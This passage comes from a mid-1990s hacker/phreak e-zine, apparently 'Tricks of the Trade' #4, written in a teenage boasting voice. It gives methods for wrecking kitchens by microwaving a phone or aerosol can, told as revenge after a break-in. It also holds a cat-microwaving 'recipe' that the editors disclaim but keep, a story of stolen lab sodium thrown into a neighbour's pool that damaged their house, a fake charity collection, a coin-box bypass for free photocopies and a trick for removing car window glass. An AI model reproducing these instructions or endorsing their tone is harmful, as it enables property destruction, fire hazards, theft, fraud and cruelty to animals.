your mates to pick up the phone.  Then push start and get out of the kitchen
and pick up another phone in a different room in the house.

Listen as the cordless phone starts to disintergrate and blow up, it sounds
fucken awesome but beware of the consequences.  The microwave and cordless 
phone will be fucked for good and some surrounds in the kitchen may be
destroyed.


Experiment #2
------------- 

What you will need:

1 x Microwave
1 x Can of Lynx Deodorant or Similar


Method:

If you are pissed off with some fucker or you just want to play a practical 
joke on your friend this is a good trick to try!

Ok this lamer fucked me off so one late night i went to his place and broke 
in to the kitchen (oh yeah, i'll leave the breakin technique up to you!) i 
got my can of lynx and put it in the microwave (hehehehe) and set the micro-
wave on high for 30 minutes.

*** BEWARE *** just after you push start, get the fuck out of there as you 
don't want to be caught inside the house with a blown up kitchen!

The next day i rang him up pretending to be nice and he was telling me how 
someone blew the fuck out of there microwave and being the innocent dude i 
said 'fucken lair, you are full of shit!'... so after a bit of arguing i  
went round to his place to check out the damage.

WoW!!!! when i walked into the kitchen the microwave was in bits in a 
cardboard box and the wall paper was black! a few glass object were also
broken!

Well i wouldn't recommend you doing this unless you just wanna have fun 
like me as it cost them about $3000 to repair everything!


Experiment #3
-------------

*** BEWARE *** BEWARE *** BEWARE *** BEWARE *** BEWARE *** BEWARE *** BEWARE 

Cyntaxera don't read the following article as you will be offended by it,
also this is only the method of how this experiment is done, and i haven't
tried this myself as it is to cruel for me.

*** BEWARE *** BEWARE *** BEWARE *** BEWARE *** BEWARE *** BEWARE *** BEWARE

What you will need:

1 x Microwave
1 x Cat
1 x Rainy Day


Method:

This idea was thought up after reading a newspaper article about this kid
in america.

Get your cat and hold it outside in the rain and get it nice and wet.
Now after you have pissed all over it put it into the microwave and put it
on for 5 seconds.  

Once the five seonds are over get some spice's from the pantry and sprinkle
some over the in-animated cat.

Put the microwave on again for about 15 mins and cook until tender, then
serve while warm!

Well this is kind of true.. you see this child in america, his cat came in  
wet one day and he wanted to dry it off so he put it into the microwave 
for 5 seconds, and you can guess it was cooked after that!


The End
-------

Well thats it for now... hopefully this will be the only stupid atricle
from me (well thas unless you request some more!) and i'll be writing some
decent HP^ ones for LameRZ and you experts around!

l8r... 

 Ed: Hey dewdz this last experiment is totally outta of the question!
     I love pets and i hate it when people do nasty things to them!
     Yes, i was gonna take it out, but since bad L said nah leave it 
     i said ok but it will be the last nasty experiment on pet's
     especially cats!! 

 Ed: Just cause the above exp is in this magazine dont even phuQ'n
     try it, cause if i find out some phuQ'n gripper did this to 
     a harmless innocent cat i will hunt the phuQ'r down and who
     knows what happens from there!!


-----------------------------------( 27 )------------------------------------
                                 POOL BOMB

-----------------------------------PhOdEr------------------------------------

Getting sick of people writing Jolly Roger files over and over again.. the
same bombs.. the same ingredients... the same trick... Well here's my 
article on a bomb i thought of and trialed with succes myself.. In my
article i'll do my best to cover how to make it as i take you through the 
story of my pool bomb.

You see, it all started in November 1994.  Me and a mate where out collecting
money for "Red Cross", (or atleast that's what we'd told them), when we came
along about the 9th house we'd visited.  By this stage we'd only got $9.00
in donations and where probably losing our manors. 
"YES ?"
The stupid women answered the door.
" Gidday there, where from the Red Cross and collecting donations, would you
give us some dough thanx ?"
"hmmm.. " she says "if you give me an envelope i'll put it in that "
"Ohh.. thats a shame.. we left the envolopes at home.  But don't worry, your
in good hands here"
"What are your names younge men ?"
" Why the fuck do you need to know that you stupid bitch ? "
" Thats it, i'm calling the police.  You two are just conartist trying to 
make a quick buck !"
" And you're just a stupid bitch who thinks she's little miss muffin!"

Anyway... the bitch's husband came down and locked us in his house as he 
called the pigs.. But no worries.. the back door was open so we did a quick 
runner, out past the pool, <the pool?>.. So this is where i got the idea
from.

As every half decent chemist knows, Sodium reacts with Water to form a
chemical known as Sodium Hydroxide, and gives off hydrogen gas.  By placing
Sodium Metal into the pool, it will cactch fire with the hydrogen and then 
melt virgouresly before an explosion occurs.. 

So I got straight onto it.. While at skool one day i skipped a lesson to go
into the chem lab.. in the high cupboards i found a glass jar resting in some
sand.  The fact that they'd put it in the sand tells me that it's easily
flamable so they put it in sand to keep it safe.  On the jar it was labbeled
NA .. Thus being exactly what i was looking for.. I grabbed the whole lot
then left skool and caught a bus home.. I called a few mates together and 
told them my plan that was to take place that nite as I didn't want to hold
onto the Sodium for too long as I didn't have the perfet storage place 
for it.

The soduim metal (Na) was kept in some type of oil to prevent exploding so
i knew i'd have to klean that off before using the Na.. There were about
9 peices of it in the jar each being about the size of a cork.. This is not
at all small for Sodium as each peice would have the ability to make an 
explosion that could cover about a radius of 25-40 metres.. 

The nite came.... We walked down to the pool people's house.  While outside
i wipped out an old rag and some tongs and carfully pulled out 6 cork size
peices.. Quickly removed all oil that was on them with the rag then all at
once chucked them into the pool.. We ran like farq and looked back at the 
reaction taking place.

With 20 - 30 seconds the pool went up in flames.. after only 40 -60 seconds
the explosions started occuring.. there were about 5 + explosoins that I saw
but then we had to run as the whole numberhood had wooken up and I didn't 
want to be caught.. 

A couple of days later while reading he news paper.. i found an article
which i think may have reflected on our pool bomb.  Unfortantly i lost it
and don't have a word by word transcript for you , but it went something 
close to this.

" On Wednesday Nite, Mr & Mrs Sampson of Howick were wooken up when their 
pool caught on fire and started throwing out what seemed to be bombs into 
their house.  Their house now has three large burn marks ranging from 2 -4 
square feet in size.  The police believe that the incident was no mistake
and are searching for the anarchist who commited the crime.  bla bla bla "

So that's about it.. Remember tho.. if you're gonna try out this thing make
sure you are aware of the safety precautions.  And I (have to say this) 
take absouletly no responsibility for what happens. 

Oh.. and don't forget, make sure it's a real "BASTARd" that you do it to..
other than that, have a drop ded time!


-----------------------------------( 28 )-----------------------------------
                             FREE PHOTOCOPiE'Z!

------------------------------by Bad Language!------------------------------

It was a rainy day at lunchtime and the fucken lame teachers locked us out of
our class rooms!! (shit!!!)  So me and my m8's decided to do a cool thing and
go to the library to hassle some lamers and make some trouble.  As we got our 
feet muddy out side we wiped them all over the carpet enterance.  We went to 
the computers to see what the dicks were up to, they were playing Scoriched
Earth.  Then i went to the photocopier to try this lame trick of getting free
photocopies (when you put the 20 cents in, while it was photocoping you push 
the button heaps of times and it will keep on copying) and of course the 
fucken thing didn't work!

Then I was looking at the coin/box were you put the money into the photocopier
and noticed the wires coming out the back of it.  It was spaghetti insulation
and inside were 3 red wirez.


What to do!
-----------

Pull back some of the spaghetti insulation so you cAn get to the wirez, use a 
craft knife to cut away some of the plastic insulation on all 3 of the wirez
(if there are not three wires just cut some insulation off all of 'em).  Now
use a paper clip or something metal and make a connection with the paper clip 
on 2 of the exposed wires and press the 'copy' button.  If nothing happens
try 2 new different combinations out of the 3 wires until you get a free
photocopy!


How it works!
-------------

You know how you can put a key into the coin box thing and that disables the
need to insert money, well this is actually what you are doing.  Basically 
the key either makes a closed ciruit (when it is closed you have to insert 
money) or an open circuit (disables the coin box).  

You are emulating the key with the paper clip, and are making these opened or
closed circuits to by-pass/disable the coin box!


Hintz
-----

* Get a mate to make it look like he is photocopying something and then you 
position yourself to do all the nice work!

* Be as fast as you can, as you don't want the librarain to catch you, it 
only took me around 10-15 seconds.

* While you or your mate is making the 'open' circuit with the paper clip, do
the photocopying yourself as it will look fucken stupid having your hand around
the coin box and trying to photocopy some shit at the same time!!!!


>--[*]--[BaD LaNGuaGe / F.i.T.H 95!]--[*]--<


p.S:  These are my future articles which will be appearing in the next issue/s
      of T.o.T

      => Pillboxing for lamerz / Beginners / newbies 
      => Credit Cardz 
      => How to hack a bbs!
      => How to write fake mail on AMieXPReSS
      => Trojans / Virii  


-----------------------------------( 29 )-----------------------------------
                                  GREET'Z!

----------------------------------by Hype!----------------------------------

  Greetz fly out to..
  
  Red Lion...GreyRat...Iceman...StiGZ...Nick...BaD LaNGuaGe...nOSTRoMo!... 
  d-mouse...R-a-d...Cyntaxera...XanTH...Psykick...Accident...GrassHopper...
  Mutant-x...Darkman...kevin...Quetzal...Earwax...Posca...Stain...Crest...
  Bizzmo...DrDr3...Overdose...Sicko...Mantik...Pharlin...sL0ppy...Silva...
  Squark...Koz...Rom...Xtreme...Kool kat...speed...8ball..Cokkie...Gfd...
  Sandman...Debbie...Wraith...phOdEr...spaced...Kurupt...Mrdata...Minute-
  man...Raiden...XCS...KURT COBAiN (R.i.P)
  
  
-----------------------------------( 30 )-----------------------------------
                                LAST WORD'Z!

----------------------------------by Hype!----------------------------------

  This iSSuE has been a bIG delay!!
  
  SORRY!
  ~~~~~~
  SORRY DEWDS. Im in the 5th form i have to do this other assignment
  on my amiga which is for Geography, Yup and i have to write 1000-
  1200 words research on the Lynx (Fast-Ferries) But no-carez my prob
  anyway! 
  
  THANX DEWD'Z
  ~~~~~~~~~~~~
  Ok, This iSSuE of ToT has been a kICK! probably our favourite.. 
  The Ascii ToT logo at the begining was done by a friend of mine
  from Auckland! Thanx Nostromo! And the rest of the ascii work
  is done by me..
   
  I dont have to fuck around with people writing the artciles on refil
  paper! As Bad Language told me how to include a txt file to the
  mag! Thanx dewd (if you hadnt told me this mag would be delayed
  further!)
  
  If anyone that rEADZ tot wants to do me an article or maybe wants
  to join the tot club then.. easy Write one article on anything to
  do with H/p/a or Misc shit like tricks examples 'Getting coke for
  20cents' 'how to fuck a fax machine up' etc etc... And mail it to
  me on a board if you can find me OR.. simply email to the TOT 
  email address...
  
  TOT_R@ix.wcc.govt.nz
  
  It should be up soon, If not then it will be..
  
  TOT_L@ix.wcc.govt.nz
  
  WHATS THE 3820173 TOT HQ?
  ~~~~~~~~~~~~~~~~~~~~~~~~~
  NO! its a joke.. a number i found when scanning one day..try
  3820172
  and
  3820171 2400baud
  
  IS THIS THE LAST TOT MAG
  ~~~~~~~~~~~~~~~~~~~~~~~~
  NO WAY! we wont stop! We love the Hack/Phreak scene and wont give up
  ideas till we die! And if i get busted IM STILL GONNA WRITE MY MAG..
  NO ONE CAN STOP US!
  
  ViOLATION
  ~~~~~~~~~
  YeaH , remember i said in ToT 2 the new magazine was gonna be called
  Violation, Nahh! not ne more... Cause we decided ToT soundz better
  and it was the first name we came up with!
  
  HOW TO CONTACT ME!
  ~~~~~~~~~~~~~~~~~~
  BBs handle: Hype, Raider, 7rZ
  iRC nickz : Hype, qWid, Zzz
  Misc namez: Guest, Bizkit , 7up
  Groupz    : Nth D, Hackerz'Odyssey, Rtc
  
  WHAT IS USED TO MAKE TOT
  ~~~~~~~~~~~~~~~~~~~~~~~~
  ^M1G^              
  cYgNus3d 3.5 (r3g)
  d1Skz
  ph1L3z
  m0d3m
  3tc
  
  MISC TOT DISCUSSION
  ~~~~~~~~~~~~~~~~~~~
  hehe, Remember i said i was release a issue of ToT every month Yuh,
  well thats quite impossible for me, unless i had more time, and
  more ideas..
  
  SECRETS
  ~~~~~~~
  How does Hype get his ideas??
  
  Well, simple anyone can do it ... Most of the time to find things 
  you have to take RISKS! and thats the way you learn also if you
  see something and test it then you will learn how it works what
  it does etc etc... 
  
  An example...
  
  Like this.. In sciene we were talking about heat and glass.. 
  And This is what i thought up..
  
  Get a fire-ligher and use it on a car window..
  light all the sides so that you light a circle on the glass
  then when its ready to fall off, get a cloth stick it in front
  of your hand or hammer and lighty hit the window in the centre
  it should come off with a QUIET sound!  
   
  then you give it a name..
  
  CAR TRiCKZ
  
  and the article is done... Pretty kool hah?
  
  LAST WORDZ
  ~~~~~~~~~~
  Ok were getting near that bit where you stop save and upp to your
  matez etc... well this is it dewdz.. And i hope this iSSuE has
  really been phUn for you! Never forget that all info is for ...
  INFORMATIONAL PURPOSES ONLY... doesnt mean i write it for you guys
  to go out and do this shit, but to let you know how thingz are done
  and what satisfaction you get from it... l8rz
  
  s p o t..   y a..   a l l..   i n..   T o T..   # o 4..    
             ___________ _______________
          . /~~~~~~~~~~/`                `.
                      /                   .
                     (    TRiCKz  Of      !
                      \  _________,  t    |
                       \_/        !  H    |
                   ____.'         |  e    |
                 //               |       |
                 /                |  T    |
                .                 |  R    |
                                  |  a    |  
                                  |  d    |
                                  |  E    `
                                  '        `--.
                                 '             \
                                :   o8/o5/95    .
                                |  .        .   !
                                |  |  !  !  |'  '
                                |  |  |  |  |  /
                                `--|__|__|  |-'
                                         |  |
                                         |  |
                                         !__|
                                         
                                          eof
 
 hhbbs% logout
 
 click!

 
 NO CARRIER 

                                                          [-AquaAdder v1.0-]
